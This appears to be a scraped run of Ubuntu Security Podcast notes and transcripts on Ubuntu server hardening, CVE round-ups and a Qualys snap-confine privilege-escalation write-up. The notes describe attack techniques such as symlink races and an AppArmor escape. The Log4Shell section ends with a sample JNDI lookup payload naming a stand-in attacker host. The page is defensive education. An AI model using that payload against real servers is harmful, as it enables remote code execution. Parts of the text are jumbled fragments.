a system. But you’re better than that. You configured things in order to avoid all power to be held by one single user and ‘sudo’ allowed you to do that. ‘Root’ cannot be restricted in any way, while ‘sudo’ users can, and that is why using ‘sudo’, even if you can have pseudo-root users through it, is a better call. And yes, I know it’s not pronounced p-seudo…but if I pronounced it correctly, as simply pseudo-root users…it would have been kind of confusing. So sorry about the mispronunciation, but I had to get that silent P across. Maybe it’s intentional though, since a ‘sudo’ user is a pseudo-root user and a pseudo-root user or a pseudo-sudo user is the end goal for an attacker hacking into a system. Guess how many times it took me to record that? Anyway, getting back on topic here…just remember to properly configure your ‘sudoers’ file. More than just defining what a user can and cannot run with ‘sudo’, you can also use ‘sudo’ itself to configure a secure path for users when they run commands through ‘sudo’. The ‘secure_path’ value can be set in the ‘sudo’ configuration file, and then, whenever a user runs a ‘sudo’ command, only values set in this parameter will be considered as being part of a user’s regular ‘PATH’ environment variable. In this way, you are able to delimit an even more specific working area for a user that is given ‘sudo’ privileges. Be careful though, and always edit the /etc/sudoers file with ‘visudo’, in order to avoid getting locked out from your own system due to syntax errors when editing this file. Do be bold, however, and go beyond the regular ‘sudo’ usage, where you create a new user that has all ‘sudo’ privileges, and instead correctly configure ‘sudo’ for your users, groups and system! It might seem like something simple, but it could make a huge difference in the long run.
So, in our Ubuntu OS here, step number one post installation to keep our system safe is to create new users and assign them to appropriate groups, which will have super user privileges and permissions set according to the minimum necessary they need to run their tasks in the system. Remember: when it comes to security, if it’s not necessary, then don’t include it. Plus, as a final bonus to not having a root user configured, not having a root password makes brute forcing the root account impossible. Well, that’s enough of using the word ‘sudo’ for one podcast episode, am I right? Let’s jump into our next hardening measure and not use the word ‘sudo’ anymore. This was the last time! I promise. Sudo! Ok, ok, it’s out of my system now! Moving on!
So I hear you have your users properly set up in your system. You now want to login to this system through the network, using one of the good old remote shell programs. It is very likely this will be configured by you, so let’s talk about how we should set this up in a secure manner. For starters, let’s not ever, ever, EVER - pleaaaase…- use unencrypted remote shells such as the ones provided by applications/protocols such as Telnet. I mean…why? Just…why? Forget about Telnet, it has broken our hearts far too much that we no longer can trust it. We know better than to let data be sent through the network in clear text, right everyone? Ok, that being said, SSH is our best and likely most used candidate here. There is a package for it in the Ubuntu main component, meaning: it is receiving support from the Canonical team, including the security team, which will patch it whenever dangerous security vulnerabilities in the software show up. Bonus points! Just installing SSH and using it will not be enough if we are truly looking for a hardened system, so, after install, there are a few configurations we must make, through the SSH configuration file, to guarantee a more secure environment. Starting off with locking SSH access for the ‘root’ user. If you didn’t enable ‘root’ user password in your system, then this is already applied by default in your Ubuntu OS, however, it is always nice to have a backup plan and be 200% sure that external users will not be able to remotely access your machine with the ‘root’ user. There could always be a blessed individual lurking around the corner waiting to set ‘root’ password because “Sudo ‘wasn’t working’ when I needed it to, so I just enabled root”. Yeesh. In the SSH server configuration file there is a variable ‘PermitRootLogin’ which can be set to ’no’, and then you avoid the risk of having an attacker directly connect to your system through the Internet with the most powerful user there is. Brute force attacks targeting this user will also always fail, but you shouldn’t worry about that if you set strong passwords, right? We also want to configure our system to use SSH2 instead of SSH1, which is the protocol version which is considered best from a security point of view. The SSH configuration file can also be used to create lists for users with allowed access and users with denied access. It’s always easier to set up the allow list, because it’s easier to define what we want. Setting up a deny list by itself could be dangerous, as new possibilities of what is considered invalid may arise every second. That being said though, being safe and setting up both is always good. You should define who is allowed to access the system remotely if you plan on implementing a secure server. Organization and maintenance is also part of the security process, so defining such things will lead to a more secure environment. The same can be done to IP addresses. It is possible to define in the SSH configuration file which IP addresses are allowed to access a device remotely. Other settings such as session timeout, the number of concurrent SSH connections, and the allowed number of authentication attempts, can all be set in the SSH configuration file as well. However, I will not dive into details for those cases since more pressing matters must be discussed here: disallow access through password authentication for your SSH server. Use private keys instead. The private-public key system is used and has its use suggested because it works, and it is an efficient way to identify and authenticate a user trying to connect. However, do not treat this as a panacea that will solve all of your problems, since, yes, using private keys to connect through SSH is the better option, but it will not be if implemented carelessly. It is well known that you can use private keys as a login mechanism to avoid having to type passwords. Don’t adopt SSH private key login if that is your only reason for it. Set a private key login for a more secure authentication process, and not because you might be too lazy to type in your long and non-obvious password. Setup a private key with a passphrase, because then there is an additional security layer enveloping the authentication process that SSH will be performing. Generate private keys securely, going for at least 2048 bit keys, and store them securely as well. No use implementing this kind of authentication if you are going to leave the private key file accessible to everyone, with ‘777’ permissions in your filesystem. Another important thing to note: correctly configure the ‘authorized_keys’ file in your server, such that it isn’t writable by any user accessing the system. The same goes for the ssh configuration file. Authorized keys should be defined by the system administrator and SSH configurations should only be changed by the system administrator, so adjust your permissions in files that record this information accordingly.
Wow. That was a lot, and we aren’t even getting started! Oh man! This is exciting, and it goes to show that hardening a system is hard work. Pun completely intended. It also goes to show that it requires organization. This might be off-putting to most, but can we really give ourselves the luxury of not caring about such configurations considering that attackers nowadays are getting smarter and more resourceful? With all the technology out there which allows us to automate processes, we should be measuring up to sophisticated attackers, and doing the bare minimum shouldn’t even be a consideration, but instead a certainty. That’s why we are going beyond here and we are implementing kernel hardening measures as well.
The ‘sysctl’ command, present in the Ubuntu system, can be used to modify and set kernel parameters without having to recompile the kernel and reboot the machine. Such a useful tool, so why not take advantage of the ease brought by it and harden your system kernel as well? With ‘sysctl’ it is possible to do things such as tell a device to ignore PING requests, which can be used by an attacker during a reconnaissance operation. Sure, this is not the most secure and groundbreaking measure of all time, however, there are other things that can be set through ‘sysctl’, this was just an introductory example, you impatient you! The reading of data in kernel logs can be restricted to a certain set of users in order to avoid sensitive information leaks that can be used against the kernel itself during attacks, when you configure ‘sysctl’ parameters to do so. So, there you go, another example. It is also possible to increase entropy bits used in ASLR, which increases its effectiveness. IP packet forwarding can be disabled for devices that are not routers; reverse path filtering can be set in order to make the system drop packets that wouldn’t be sent out through the interface they came in, common when we have spoofing attacks; Exec-Shield protection and SYN flood protection, which can help prevent worm attacks and DoS attacks, can also be set through ‘sysctl’ parameters, as well as logging of martian packets, packets that specify a source or destination address that is reserved for special use by IANA and cannot be delivered by a device. Therefore, directly through kernel parameter settings you have a variety of options, that go beyond the ones mentioned here, of course, and that will allow you to harden your system as soon as after you finish your install.
So, we’ve talked about the users, we’ve talked about SSH, we’ve talked about the kernel, and we have yet to pronounce that word that is a cyber security symbol, the icon, used in every presentation whenever we wish to talk about secure systems or, by adding a huge X on top of it, breached networks. The brick wall with the little flame in front of it. The one, the only, the legendary and beloved firewall. No, firewalls are not the solution to all security problems, but if it became such an important symbol, one that carries the flag for cyber security measures most of the time, it must be useful for something, right? Well, let me be the bearer of good news and tell you that it is! Firewalls will help you filter your network traffic, letting in only that which you allow and letting out…only that which you allow. Amazing! If you have a server and you know what ports this server will be using, which specific devices it will be connecting to and which data it can retrieve from the Internet and from whom, then, you can set up your firewall very efficiently. In Ubuntu, you can use ‘ufw’, the Uncomplicated Firewall, to help you set up an efficient host based firewall with ‘iptables’. “Why would I need a host based firewall if I have a firewall in my network, though?”, you might ask. Well, for starters, having a backup firewall to protect your host directly is one more protection layer you can add to your device, so why NOT configure it? Second of all, think about a host based firewall as serving the specific needs of your host. You can set detailed rules according to the way the device in question specifically works, whereas on a network based firewall, rules might need to be a little more open and inclusive to all devices that are a part of the network. Plus, you get to set rules that limit traffic inside the perimeter that the network firewall limits, giving you an increased radius of protection for the specific device we are considering here. Another advantage, if the various mentioned here are not enough: if your server is running on a virtual machine, then when this machine is migrated, that firewall goes with it! Portability for the win! If you are not convinced yet, I don’t know what to say other than: have you seen the amazing firewall logo? Putting that cute little representation of cyber security in the host diagrams in your service organization files will definitely bring you joy, guaranteed.
Next in configuring our still waiting to become a full-fledged server system is ‘fstab’. The ‘fstab’ file is a system configuration file in Ubuntu which is used to define how disk partitions and other block devices will be mounted into the system, meaning, defining where in the Linux directory tree will these devices be accessible from when you are using the operating system. Therefore, everytime you boot your computer, the device which contains the data that you expect to use needs to be mounted into the filesystem. ‘Fstab’ does that for you during the boot process, and what is even better: it allows you to set options for each partition that you will mount, options that change how the system views and treats data in each of these partitions. Remember eons ago when we were talking about disk partitioning and I said there was more to it than just isolating /tmp from everything? Well, the time has finally come to talk about it. So, even though it’s not Thursday let’s go for the throwback and keep the /tmp example alive shall we? If during install you separated your partitions and put /tmp in its own separate area, you can use ‘fstab’ when mounting the partition that will be represented by the /tmp directory and set it as a ’noexec’ partition. This is an option that tells the system that no binaries in this partition are allowed to be executed. You couldn’t have done this if your entire system was structured to be under one single partition, or else the entire partition would be non-executable, and then you could not have a server running on that device. You could also go one step further and make the partition read-only, although for /tmp that might not be the best choice given the reason for its existence. Applying this to another situation though, if you have a network shared directory with its own partition, for example, it is possible to make this partition read-only, and avoid consequences that might arise from having users over the internet being able to write to it. Another suggestion: setting up the /proc directory with the ‘hidepid=2, gid=proc’ mount options as well as the ’nosuid’, ’noexec’ and ’nodev’ options. The /proc directory is a pseudo-filesystem in Linux operating systems that will contain information on running processes of the device. It is accessible to all users, meaning information on processes running in the system can be accessed by all users. We don’t necessarily want all that juicy data about our processes to be available out there for anyone to see, so setting the ‘hidepid’ and ‘gid’ parameters to the previously mentioned values will make it that users will only be able to get information on their own processes and not on all processes running in the server, unless they are part of the ‘proc’ group. The ’noexec’, ’nosuid’ and ’nodev’ options will make this part of the filesystem non-executable, block the operation of ‘suid’ and ‘sgid’ bits set in file permissions and ignore device files, respectively, in this file system. So…more hardening for the partition. A simple one line change in the /etc/fstab file that can make a very big difference when considering the protection of your server. Though, once again, I stress that all of these are possibilities and, considering our main example here, if you do have software that requires execution /tmp, which is a possibility when we consider that there are packages that execute files from /tmp during install, please do not follow the suggestions here directly, but instead adapt them to your environment and your needs. Listener discretion is therefore advised.
Our last post install tip comes in the shape of a file…a file filled with lines and more lines of information about your system. Use your logs! Take care of your logs! Embrace your logs. Ignorance might be bliss in a lot of situations, but when it comes to a computing device, going that extra mile to understand it might be what saves you from the future robotic takeover a lot of people are expecting to happen. Why? Because if you know the logs, you know the system, what is happening, where are the issues! And then when the robots conquer, you will be the one that knows how it feels, it’s innermost secrets. The connection you build with that single computer might save the world from AI takeover. Victory through empathy. Ok, seriously though, I continue dramatic as ever, but do not let my exaggeration stir you away from the most important takeaway here. Most of the logging information in an Ubuntu system will be found under the /var/log directory, with logging being performed primarily by ‘syslog’. The ‘syslog’ daemon will generate all kinds of log files, from authorization logs, to kernel logs to application logs. Apache, for example, has a log file entry under /var/log, considering you have it installed in your system. You can configure your device to use the syslog daemon to send log data to a syslog server, which will centralize log data that can then be processed by another application in a faster and more automated manner. Do remember to transfer your logs through the network in a secure, preferably encrypted fashion though, or else you are just leaving sensitive data about your server and everything in it out there for the taking. That being said, here, your configuration file of choice will be /etc/syslog.conf. In this file, you will tell the ‘syslog’ daemon what it should do with all that data gold it’s collecting from your system. You can set what is the minimum severity level for messages that will be logged, as well as set what will be done to these log messages once they are captured. These can be piped into a program, for example, which can then process the message further and take some kind of action based on the outcome, like sending the message via e-mail to a desired mailbox, or, as previously mentioned, they can be sent directly to a centralized server that will perform further analysis of the information through another third party software. With the data and the means to send it to a place where it can be properly processed, you have all that is necessary to appropriately and securely understand what is happening to your system. You can then follow up on issues quickly enough whenever you have one that is a threat to your server’s security. Reaction measures are also a part of the hardening process, since we can have situations where prevention is just not enough.
Billions of theoretical years have passed so far for our ever expanding and evolving digital galaxy…and I am sure it actually feels like that after all the talking I have done, but please bear with me for a little while longer. Earth is finally ready to have its first living creature be born! It is finally time to install the software needed to transform this, up until this point, regular device, into a mighty Internet connected server. It is time to get our applications running, our ports open, and our data flowing. Let’s do this securely, however, shall we? Wait. Not yet though. Earth was able to wait a billion years, so you might just be able to wait another week! I know. I am being mean. Anyway, not much I can do about it now! Don’t forget to share your thoughts with us on our social media platforms and I will see you all next week for the grand finale! Bye!
It’s a big week for kernel security vulnerabilities - we cover Dirty Pipe and fixes for the latest microarchitectural side channel issues, plus we bring you the first in a 3 part series on hardening your Ubuntu systems against malicious attackers.
34 unique CVEs addressed
Set-Cookie2
header - obsolete HTTP response header
used to send cookies from the server to the user - possible infinite loop
when parsing responses which contained this headerpackage
variable and as
such left this global variable uninitialised - an attacker with the
ability to execute a Lua script could then cause Lua to load the full
system liblua unsandboxed and hence then use this to execute other
arbitrary commands on the hostpipe
and splice
system calls to cause the kernel to overwrite contents
of arbitrary files even when a user had no write permission to the
particular file (even on immutable and RO-filesystems)Hello listener! Welcome to another episode of the Ubuntu Security Podcast where I, Camila, will be talking to you all more about one subject or another involving the Ubuntu Linux distribution and cyber security in general. Today’s episode is a response to a request. A request from someone that wants to learn more about how it is possible to create an Ubuntu system, which will be running some type of service, in a secure manner. After all, we do live in times where threats that were only physical have migrated to the digital world as well, so just having a server set up with all ports open and no access control set is no longer an option for those that wish to use the almighty Internet to provide some type of service. Heck! The concern should exist even if you don’t wish to have an Internet facing server, but simply if you own a computer…or a smartphone…or a smart TV…or a car. Or anything really. We are all connected by our WiFis, whether we want it or not, so taking care of our own digital perimeter has become something essential, and something that we all should be applying to not get spammed nor scammed in the days of today. So, since I do love me some lists, let’s talk about, in a chronological list format, what measures you can apply to your Ubuntu OS and what tools can you use in this same OS to make it safer, hardened against the cold and harsh wave of 0’s and 1’s that might be traveling out there through fiber optics cables just waiting to hack into your system.
Let’s start with the basics and talk about what can be done with the tools that you already have when you have an Ubuntu Linux coming fresh out of the bootable USB stick you used to format your computer. Actually, if we are indeed doing this, let’s do it for real: we will go back even further, and talk about the basics that can be done not only after a fresh install, but also, while you are installing your system. Let’s get prepared for the Ubuntu big bang and talk about what needs to happen before our binary universe can start to exist and securely function inside our CPUs and hard drives.
During an Ubuntu install you will make a few choices, such as whether or not you want to encrypt data in your disk. If you are not the one installing your own system, and you have an already running basic Ubuntu system in a cloud service platform, for example, this might not be something possible for you. However, if you do have the chance to apply this, it is a hardening measure that can be used to protect all data being saved in your hard drive. Of course, we need to consider that not all situations might fit well with this, as, for example, a server that forces the system to reboot frequently would require a password every time at system startup, something that one might not want to do, or be available to do, every single time, specially considering a situation where a completely automated system is the main goal to be achieved here. It is also important to consider that encrypting your hard drive might affect general file I/O performance, since data being read from the disk needs to be decrypted everytime, before being presented to the user or to the system for further processing, and data that will be written to the system needs to be encrypted before it is sent permanently to the hard drive. However, if none of those cases concerns you at all, the question here might be: why NOT encrypt your hard drive? If your hardware allows it, making the process fast, it might even be worth it despite the delay you can have due to the necessary encryption and decryption operations being performed. Either way, your data can be protected from those that might want to access it without authorization. Do not kid yourself by thinking that hackers will always stay behind a screen, as there are the very bold who might just think that by stealing your hard drive they will get what they need. Without a password, though, hackers can connect the disk to whatever computer they like, but the data will remain encoded and unreadable. Remember though, full disk encryption will NOT protect data in transit, also known as data you sent through the wires or through the air, via the World Wide Web, to other devices around the world. Disk encryption, as the name suggests, is local to the disk which is associated with your own device. Oh, also do be aware that the password that is used to encrypt the disk cannot be lost or else, you might be your own worst enemy and lose your data which becomes nearly impossible to crack cipher text.
Still talking about disk configurations during the installation process, do consider creating a swap partition when setting up your system. The swap partition is essentially used by the Ubuntu System as if it were RAM. Therefore, if your RAM is filled up completely, the swap partition, which is actually a part of the hard drive, will be used rather than the RAM memory space to perform operations. necessary A swap partition can also be used to make more RAM space available during a certain point in processing time, said space being provided for data that is more relevant or is being used more frequently. Data that is being less used, less referenced, can therefore be moved to swap space instead of being left in the ever busy, constantly used RAM. The swap will act as an extension of your RAM, but do note, it is not as efficient as RAM, since it is actually your hard drive pretending to be something that it is not: a volatile memory device. Setting up a swap partition, however, can be very useful to increase performance in your server. As previously mentioned, swap space can be used to store data that is not all that frequently accessed, opening up space in RAM for more regularly accessed information. Since data in the swap is not being used constantly, the delay you would have when performing I/O operations on it becomes less of an issue, and you essentially gain more RAM space to process whatever your server needs to process. And, you know, even if people do forget it sometimes, remembering about it only when they suffer a massive DoS attack, availability is one of the 3 pillars of cyber security, so preparing for that in order to guarantee a system with better performance is valuable. Another big advantage of having swap lies in the fact that you as a system administrator might have more time to react to possible memory issues when your server is facing them. When you run out of memory and you don’t have swap, you risk having your system suddenly crash and not only losing all data that was in RAM, but having your service be out of reach for whoever knows how long. You can also have OOM killer go and kill your most important process because you are…running out of memory…and it doesn’t even have the courtesy of asking you if you are ok with it. Just rude! If you set up your swap space to at least the size of your largest process though and you monitor your system, you are able to detect possible issues by analyzing swap space usage, and then you can most likely avoid many undesired service and system crashes. However, do not forget: setting swap can boost your system performance, as it can hinder it if you don’t implement things correctly. Your main volatile memory source should be your RAM, and the swap partition will not be a substitute for it. Therefore, if you have little RAM and over encumber your system, you won’t make it any faster by using swap, as the hard drive will be used to process that overflowing amount of data that should be being processed primarily by your RAM. The idea is to use swap as a complimentary performance measure to your appropriate RAM sized system. If using swap memory, don’t forget to configure how this extra memory space will be used together with your RAM, by setting the ‘swapiness’ metric, for example, which will tell the kernel how aggressively it will swap memory pages in the system when necessary. Once again, setting too much of a high value might make your system inefficient as you start making your kernel believe that the harddrive is actually RAM - the perfect disguise - but setting a low value might also not give you the best performance possible. Each case will be its own, so know your system and your needs, and act accordingly.
Our install happens on our disk, so, unfortunately I must tell you that once again we will be checking out disk settings we can consider when creating our hardened Ubuntu server. Cheers to our disks! Installing all of the system in one single partition tends to be a lot easier and a lot faster. However, we are not looking for easy here, we are looking for secure, so let’s get out of the one single partition and out of our comfort zones and possibly separate our system directories into different partitions. Having /boot in a separate partition is useful to avoid not being able to log into a system after the current kernel image has run across issues. The backup kernel images will be available and you might be able to do a quicker recovery that won’t require connecting an external device in, or removing your own in order to fix what has been broken in the OS. In case you encrypt your / (root) partition, you will need to perform this regardless, or else, your OS won’t boot. Encrypted code might be cool looking but it’s not exactly functional considering a situation where you need to know what are the basic instructions that will allow you to get the operating system up and running. Encrypting /boot together with / (root) would be the same as hearing the “ready, set, go” at a car race and staying stuck in place because you just remembered you put a boot in your wheel. The locked boot is stopping you from moving the car forward and getting it where you need it to be, and, considering /boot outside of the analogy, it’s stopping you from getting your computer to execute your operating system because it’s encrypted. Therefore, if you encrypt your hard drive, as previously suggested, you already get to escape from the old boring one partition scheme. That being said with this very convenient analogy, let’s get back to it and discuss the other partitioning options you might have and that you can apply to your system in order to make it more efficient and more secure, options which include, for example, putting /tmp in a separate partition. This is most likely a good call, especially considering that world-writable /tmp is a common target for attackers. Servers that might use /tmp for storage of, as the name suggests, temporary files could cause a self DoS in case this directory is filled up with various large files. If the directory is in a different partition, however, only that specific partition will fill up and not the entire system storage instead. Other processes using other directories in your system are unaffected and only the process filling up /tmp is terminated. It is also a lot easier to manage a filled up /tmp partition than it is the entire system. Plus, different permissions can be set for this specific partition later on, but we will discuss this soon enough, albeit not now. Separating the /home and the /var directories from the rest of the system also shares these advantages. Leaving these directories in their own separate “drawers” inside the closet that is our hard drive might be an interesting choice in order to avoid necessary space to be taken up by a file that might not be essential for the workings of the server. The /home directory will contain user files, and we don’t trust users, and the /var directory might get filled up completely with a huge amount of logs, for example. Filling up the logs might be an attack of choice made by some hacker out there, but if you created a separate partition, you were prepared for it. Having smaller partitions also makes for faster file searches in the system, which might be a valid performance boost for your IT infrastructure. If you plan to share resources through the network, have these resources be connected to a directory mounted in a separate partition, as you can have more permissive access control rules in the shared partition, but keep the rigorous one in all others that might contain sensitive information, which is in itself another advantage: different partitions, different permissions during mount time. However, we will go into more detail about this later on, as I already mentioned. The point here is: separate partitions are separate filesystems, and, therefore, the OS will not behave in the same way as it would if all data were to be stored under a single partition…a single filesystem. All of that being said, it will require more management than a system that has only one partition, and space usage might not be the most efficient when you establish limits to each directory. However, if it is feasible for your needs, it might be a good way to avoid some issues…security issues.
Up next, I say this everytime and I will never get tired of saying it: strong passwords, people! Strong passwords! Whenever creating the first user for your Ubuntu system, which will happen during the install process, do not use your birthday as your password. Or your dog’s name…or any 6 letter word followed by the digits that are the current year. Easy to remember, easy to hack. The first step to avoid being hacked is not wanting to be hacked, and forgive you me if I am being too blunt, but setting up lazy passwords and not expecting it to be a problem is like eating rotten food and expecting to not get sick: you can wish all you want, but the outcome will not be positive for you, my friend…and to your closest loved ones involved. So…strong passwords, please, and non-expired food.
Our system is installed. BIG. BANG. Our Ubuntu OS universe now exists after we set everything up so that it looks just right for our security needs. All is not done, however, since after the big-bang, the galaxy and more specifically Earth, had to go through a lot of steps before it was ready to host life, which is our main goal here: host life in the form of executable, network service providing code. We now have galaxies, stars, planets, and all necessary to maybe create life in the future, but first things first, we need our huge ball of fire to be tweaked a little bit, since life as we know it will not be born in such an unsafe, or might I say, insecure environment. Let’s then make it secure so that we can start thinking about giving it some life, or, in our case, installing some software, developing customized code, setting up frameworks, all that good stuff that makes developers go crazy with excitement.
I will, however, keep you on your toes, and continue talking more about this subject in another episode only! So stay tuned to the podcast to continue on this Ubuntu hardening journey with me, and while you wait for what is to come, feel free to share your thoughts in any of our social media platforms, as your opinion is always welcome! I await your return to the podcast in the following weeks so that we can once again share information, but for now I bid you all farewell and until next time! Bye!
This week we do the usual round-up of security vulnerability fixes for the various Ubuntu releases, plus we discuss enabling PIE for Python and preview some upcoming content on Ubuntu system hardening as well.
44 unique CVEs addressed
wordexp()
/ realpath()
/ getcwd()
functions etcUbuntu 20.04.4 LTS is released, plus we talk about Google Project Zero’s metrics report as well as security updates for the Linux kernel, expat, c3p0, Cyrus SASL and more.
62 unique CVEs addressed
lol
which was defined as 10 copies of lol8
which was defined as 10 copies of
lol7
etc…The Ubuntu team is pleased to announce the release of Ubuntu 20.04.4 LTS (Long-Term Support) for its Desktop, Server, and Cloud products, as well as other flavours of Ubuntu with long-term support.
Like previous LTS series, 20.04.4 includes hardware enablement stacks for use on newer hardware. This support is offered on all architectures.
Ubuntu Server defaults to installing the GA kernel; however you may select the HWE kernel from the installer bootloader.
As usual, this point release includes many updates, and updated installation media has been provided so that fewer updates will need to be downloaded after installation. These include security updates and corrections for other high-impact bugs, with a focus on maintaining stability and compatibility with Ubuntu 20.04 LTS.
Kubuntu 20.04.4 LTS, Ubuntu Budgie 20.04.4 LTS, Ubuntu MATE 20.04.4 LTS, Lubuntu 20.04.4 LTS, Ubuntu Kylin 20.04.4 LTS, Ubuntu Studio 20.04.4 LTS, and Xubuntu 20.04.4 LTS are also now available. More details can be found in their individual release notes:
https://wiki.ubuntu.com/FocalFossa/ReleaseNotes#Official_flavours
Maintenance updates will be provided for 5 years for Ubuntu Desktop, Ubuntu Server, Ubuntu Cloud, and Ubuntu Core. All the remaining flavours will be supported for 3 years. Additional security support is available with ESM (Extended Security Maintenance).
This week Qualys dominate the week in security updates, disclosing details of 4 different SUID-root vulnerabilities, including Oh Snap! More Lemmings (Local Privilege Escalation in snap-confine), plus we look at updates for Firefox, cryptsetup and more.
23 unique CVEs addressed
/proc/self/mountinfo
to validate if is a FUSE fs(deleted)
to the name
of it in the mount tablemountinfo
to get the actual path(deleted)
in
the name - and then libumount will strip this off and umount the original
path - ie. could mount at /tmp/ (deleted)
then call umount /tmp
and this
will succeed(deleted)
suffix as this has not been used
by the kernel since December 2014https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt
Qualys appear to have been auditing various SUID-root binaries - recently
looked at snap-confine - low-level application, written in C, and used by
snapd to setup the execution environment for a snap application - as the
name suggests, it setups up the confinement for an application, creating
a separate mount namespace with own private /tmp
and /dev/pts
- as well
as any other mounts through content interfaces or layouts etc defined by
the snap, plus loading of seccomp syscall filters for the resulting snap
As such requires root privileges, hence is SUID-root - high value target
Very defensively programmed itself, plus is confined by seccomp and AppArmor itself
Nonetheless, even the most carefully programmed software can have issues
2 vulns:
Qualys liken these vulnerabilities (or the process to finding them) as like playing the original Lemmings game, due to the complex nature of steps required to thwart the defense-in-depth construction of snap-confine
Not the first time snap-confine has been audited - SuSE Security Team previously audited it in 2019 and found a couple issues, in particular in some of the same code sections as these
Back to these vulns:
When creating or deleting the mount namespace, snap-confine uses 2
helper programs written in Go - these are installed in the same
location as snap-confine, so it looks them up from the same directory
where it is running itself - however, since (when protected_hardlinks
is disabled) an unprivileged user could hardlink snap-confine into say
/tmp
they could also then place their own malicious binary in place of
these helpers and have that get executed by snap-confine instead
NOTE: protected_hardlinks
is enabled by default on almost all distros
so unless this has been changed by the system admin, this is unable to
be exploited in reality
Other vuln is a race condition when creating the private mount
namespace for the snap - snap-confine creates a per-snap private
directory under /tmp
- this is a known “dangerous” thing to do since
/tmp
is world writable so users could easily try and symlink their own
contents into it etc
snap-confine is very careful then to try and ensure this directory is owned by root and to then avoid following symlinks when traversing this hierarchy etc
However, when then doing the actual mount()
syscall to start setting up
the mount namespace inside this directory, the absolute path of this
directory is given to mount()
(since sadly there is no mountat()
or
similar syscall) - which then does follow symlinks allowing a user who
an race the creation of this directory with snap-confine to be able to
take control of the contents of it, and hence inject their own
libraries and configuration such that a malicious library can be
preloaded into a subsequent execution of snap-confine - and since
snap-confine will then still run as root, this allows to get root code
execution
In both cases, the use of AppArmor by default tries to isolate
snap-confine - and snap-confine is programmed defensively such that it
will refuse to execute if it is not confined by AppArmor - however, the
checks for this were not strict enough, and Qualys found they could use
aa-exec
to execute snap-confine under a separate, more permissive
AppArmor profile to escape these restrictions
Fixes for these issues were numerous - to both add additional hardening
to snap-confine so that it would validate the AppArmor profile it
executes under is the one that is expected - plus the actual fixes for
the vulnerabilities themselves, by checking snap-confine
is located where
it expects to be (so it doesn’t execute other arbitrary helpers), and to
also when setting up the mount namespace directory hierarchy, forcefully
try and move aside any existing parts that are not root owned so it can
create them afresh with known ownership/permissions so that unprivileged
users can’t trick it with their own contents
As mentioned, also includes fixes for 2 other issues identified by Canonical - open permissions on snap per-user HOME/private storage allows other users to potentially access private info stored by snaps
Plus a more sinister issue in the handling of AppArmor rules for snaps
A snap can define a content interface - way of making files available to other snaps - snaps can then connect to this to access that content - often used to implement plugins or other such concepts between snaps
When creating an AppArmor profile for a snap, adds additional rules then to allow access to these paths within the other snap
Included code to validate that a snap wasn’t trying to expose content it shouldn’t BUT didn’t validate that these were just paths and nothing else
Since AppArmor policy is human-readable text files, these get generated by snapd by adding the content interface paths into the policy
Content interface path could then contain additional AppArmor policy directives and these would get included in the generated profile
Since any snap can specify content interfaces, and they get auto-connected by snaps from the same publisher, would then just have to get a user to install 2 malicious snaps from the same publisher where one declares a malicious interface like this and then the snaps will be able to escape the usual strict confinement provided by AppArmor
Fixed in snapd to both validate paths more correctly, and to also quote all file-system paths in the generated AppArmor policies so that arbitrary rules cannot be specified
Shows that the defence-in-depth approach is still worthwhile - Qualys mentions they nearly gave up looking for vulns and then on trying to exploit them due to just how hard the task appeared given all the defensive measures they would have to overcome
Want to thank Qualys for all their efforts in disclosing vulns and in providing feedback on proposed fixes etc, and the snapd team for all their help on finding and remediating the vulnerability with content interface / layout paths, plus on preparing and delivering this update
Has been in the works for a while, glad it is finally out
It’s main vs universe as we take a deep dive into the Ubuntu archive and look at these components plus what goes into each and how the security team goes about reviewing software destined for main, plus we cover security updates for Django, BlueZ, NVIDIA Graphics Drivers and more.
53 unique CVEs addressed
vfs_fruit
RCE{% debug %}
template tag - failed to
properly encode the current contextWe’re back after a few weeks off to cover the launch of the Ubuntu Security Guide for DISA-STIG, plus we detail the latest vulnerabilities and updates for lxml, PolicyKit, the Linux Kernel, systemd, Samba and more.
100 unique CVEs addressed
CL_SCAN_GENERAL_COLLECT_METADATA
option and
handling OOXML files - remote attacker could supply an input file which
could trigger this -> crash.screenrc
file which could
possibly contain private infoLD_PRELOAD
value to cause arbitrary code to be
executed as rootDISA-STIG is a U.S. Department of Defense security configuration standard consisting of configuration guidelines for hardening systems to improve a system’s security posture.
It can be seen as a checklist for securing protocols, services, or servers to improve the overall security by reducing the attack surface.
The Ubuntu Security Guide (USG) brings simplicity by integrating the experience of several teams working on compliance. It enables the audit, fixing, and customisation of a system while enabling a system-wide configuration for compliance, making management by diverse people in a DevOps team significantly easier.
The DISA-STIG automated configuration tooling for Ubuntu 20.04 LTS is available with Ubuntu Advantage subscriptions and Ubuntu Pro, alongside additional open source security and support services.
https://ubuntu.com/blog/ubuntu-introduces-the-ubuntu-security-guide-to-ease-disa-stig-compliance
Ubuntu 21.04 goes EOL soon, plus we cover security updates for Django, the Linux kernel, Apache httpd2 + Log4j2, Ghostscript and more.
28 unique CVEs addressed
Storage.save()
with crafted file namesdictsort
template filter to disclose info or
make method calls when passing in a crafted key - Django upstream remind
that should always validate user input before usemmap()
or SYSV shmem syscalls with the SHM_HUGETLB
flagTIPC
+ MSG_CRYPTO
OOB write, and Firewire OOB write - both can be used
by local unprivileged users to cause DoS / possible code executionProxyRequests on
)The Ubuntu Security Podcast is back for 2022 and we’re starting off the year with a bang💥! This week we bring you a special interview with Kees Cook of Google and the Linux Kernel Self Protection Project discussing Linux kernel hardening upstream developments. Plus we look at security updates for Mumble, Apache Log4j2, OpenJDK and more.
31 unique CVEs addressed
smb
to then refer to a .desktop
fileQDesktopServices::openUrl
function100 Continue
responses - malicious HTTP
server could cause a DoS against clients - affects allHappy holidays! This week we bring you the second part of a special two-part holiday themed feature by Camila from the Ubuntu Security team discussing how best to protect yourself and your systems from the top cyber threats faced during the holidays.
Happy holidays! This week we bring you the first part of a special two-part holiday themed feature by Camila from the Ubuntu Security team discussing the top cyber threats faced during the holidays.
Just in time for the holidays, Log4Shell comes along to wreck everyone’s weekend - so we take a deep dive into the vulnerability that has set the internet on fire, plus we cover security updates for BlueZ, Firefox, Flatpak and more.
27 unique CVEs addressed
GLIB_CHARSETALIAS_DIR
env var, could then possibly exploit
setuid binaries like pkexec
which are linked against glib to possibly
read root-owned files - fixed to just have glib not read and use this
environment variable2.15.0
for Ubuntu >= 20.04 LTS and
otherwise removed the offending class in Ubuntu 18.04 etc (USN-5192-1)${jndi:ldap://attacker.com/malware}
Log4j will perform the lookup via LDAP to retrieve the Java class at
